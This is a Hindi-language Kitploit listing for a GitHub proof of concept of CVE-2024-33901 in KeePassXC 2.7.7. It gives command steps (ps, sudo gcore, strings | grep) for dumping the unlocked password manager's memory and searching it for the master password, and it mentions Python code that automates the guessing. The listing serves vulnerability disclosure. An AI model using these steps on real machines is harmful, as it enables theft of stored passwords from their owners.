Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-33901-ProofOfConcept — CVE-2024-33901 कमजोरी को प्रदर्शित करने वाला छोटा प्रोग्राम, KeePassXC संस्करण 2.7.7 में | Kitploit
उपकरण/GitHubGitHub/gmikisilva/cve-2024-33901-proofofconcept
पासवर्ड क्रैकिंगमेमोरी फोरेंसिकभेद्यता विश्लेषणशोषणडेटा निष्कासनडिजिटल फोरेंसिक
GitHubgmikisilva/cve-2024-33901-proofofconcept

CVE-2024-33901-ProofOfConcept

CVE-2024-33901 कमजोरी को प्रदर्शित करने वाला छोटा प्रोग्राम, KeePassXC संस्करण 2.7.7 में

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
261 साल पहलेअभी तक समीक्षित नहीं

CVE-2024-33901-ProofOfConcept

एक छोटा प्रोग्राम जो KeePassXC संस्करण 2.7.7 में CVE-2024-33901 कमजोरी को प्रदर्शित करता है।

रिपोर्ट के लिए शायद स्रोत कोड को लिंक करने की आवश्यकता हो सकती है, इसीलिए मैंने इसके लिए रेपो बनाया।

कमजोरी को दोहराने का तरीका

  1. KeePassXC खोलें और डेटाबेस को प्रमाणित करें।

  2. जब डेटाबेस प्रमाणित हो, तो इसका एक मेमोरी डंप फ़ाइल बनाएँ।

    यह PID प्राप्त करके किया जा सकता है, जो इस कमांड से किया जा सकता है:

    ps aux | grep keepassxc

    और फिर यह कमांड चलाएँ: sudo gcore -o keepassxc_dump PID_HERE

    उदाहरण के लिए, यदि आपको मिला PID 1234 था, तो कमांड इस प्रकार होगी:

    sudo gcore -o keepassxc_dump 1234

  3. अंत में, आप यह कमांड चला सकते हैं: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"

    इसलिए यदि PID 1234 था, तो कमांड होगी:

    cat keepassxc_dump.1234 | strings | grep "password guess here"

एक बार मेमोरी डंप फ़ाइल बन जाने के बाद, हमला तब भी किया जा सकता है जब डेटाबेस फिर से लॉक हो जाए या KeePassXC बंद कर दिया जाए।

प्रदान किया गया Python कोड इन सभी चरणों को निष्पादित करता है, और प्रदान की गई टेक्स्ट फ़ाइलों के आधार पर कई पासवर्ड अनुमान लगाने का प्रयास करता है।

टूल डाउनलोड करें